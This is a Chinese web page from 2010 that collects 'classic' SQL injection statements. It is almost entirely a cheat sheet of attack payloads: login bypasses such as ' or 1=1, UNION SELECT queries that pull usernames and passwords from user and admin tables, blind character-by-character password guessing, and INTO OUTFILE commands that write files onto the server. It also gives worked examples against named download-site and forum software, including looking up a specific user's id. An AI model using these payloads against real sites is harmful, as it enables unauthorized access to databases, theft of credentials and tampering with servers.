首页 电脑 电脑学堂 查看内容

注入经典语句集合

2010-2-25 16:00 622 0

摘要:     注入经典语句大汇总:     ' or 1=1     ' or '1=1  &nbs...
关键词: nbsp select union password WHERE 20 user userid username eventdate

    注入经典语句大汇总:     ' or 1=1     ' or '1=1     '/*     '%23     ' and password='mypass     id=-1 union   select 1,1,1     id=-1 union   select char(97),char(97),char(97)     id=1 union   select 1,1,1 from members     id=1 union   select 1,1,1 from admin     id=1 union   select 1,1,1 from user     userid=1 and password=mypass     userid=1 and mid(password,3,1)=char(112)     userid=1 and mid(password,4,1)=char(97)     and ord(mid(password,3,1))>111 (ord函数很好用,可以返回整形的)     ' and LENGTH(password)='6(探测密码长度)     ' and LEFT(password,1)='m     ' and LEFT(password,2)='my     …………………………依次类推     ' union   select 1,username,password from user/*     ' union   select 1,username,password from user/*     =' union   select 1,username,password from user/* (可以是1或者=后直接跟)     99999' union   select 1,username,password from user/*     ' into   outfile 'c:/file.txt (导出文件)     =' or 1=1 into   outfile 'c:/file.txt     1' union   select 1,username,password from user into   outfile 'c:/user.txt     SELECT password FROM admins WHERE login='John' INTO DUMPFILE '/path/to/site/file.txt'     id=' union   select 1,username,password from user into   outfile     id=-1 union   select 1,database(),version() (灵活应用查询)     常用查询测试语句,     SELECT * FROM table WHERE 1=1     SELECT * FROM table WHERE 'uuu'='uuu'     SELECT * FROM table WHERE 1<>2     SELECT * FROM table WHERE 3>2     SELECT * FROM table WHERE 2<3     SELECT * FROM table WHERE 1     SELECT * FROM table WHERE 1+1     SELECT * FROM table WHERE 1--1     SELECT * FROM table WHERE ISNULL(NULL)     SELECT * FROM table WHERE ISNULL(COT(0))     SELECT * FROM table WHERE 1 IS NOT NULL     SELECT * FROM table WHERE NULL IS NULL     SELECT * FROM table WHERE 2 BETWEEN 1 AND 3     SELECT * FROM table WHERE 'b' BETWEEN 'a' AND 'c'     SELECT * FROM table WHERE 2 IN (0,1,2)     SELECT * FROM table WHERE CASE WHEN 1>0 THEN 1 END     例如:夜猫下载系统1.0版本     id=1 union   select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1     union   select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user     union   select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1     id=10000 union   select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and groupid=1     union   select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 (替换,寻找密码)     union   select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49 (验证第一位密码)     union   select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,2,1))=50 (第二位)     union   select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,3,1))=51     …………………………………………………………     例如2:灰色轨迹 变换id进行测试(meteor)     union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate     union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',pass(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%2010)%20order%20by%20eventdate     构造语句:     SELECT allowsmilies,public,userid,eventdate,event,subject FROM calendar_events WHERE eventid = 1 union (select 1,1,1,1,1,1,1 from user where userid=1)     SELECT allowsmilies,public,userid,eventdate,event,subject FROM calendar_events WHERE eventid = 1 union (select 1,1,1,1,username,password from user where userid=1)     UNION%20(SELECT%201,0,2,'1999-01-01','a',password%20FROM%20user%20WHERE%20userid%20=%205)%20order%20by%20eventdate     UNION%20(SELECT%201,0,12695,'1999-01-01','a',password%20FROM%20user%20WHERE%20userid=13465)%20order%20by%20eventdate     UNION%20(SELECT%201,0,12695,'1999-01-01','a',userid%20FROM%20user%20WHERE%20username='sandflee')%20order%20by%20eventdate (查沙子的id)     (SELECT a FROM table_name WHERE a=10 AND B=1 ORDER BY a LIMIT 10)     SELECT * FROM article WHERE articleid='$id' union   select * FROM……(字段和数据库相同情况下,可直接提交)     SELECT * FROM article WHERE articleid='$id' union   select 1,1,1,1,1,1,1 FROM……(不同的情况下)
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部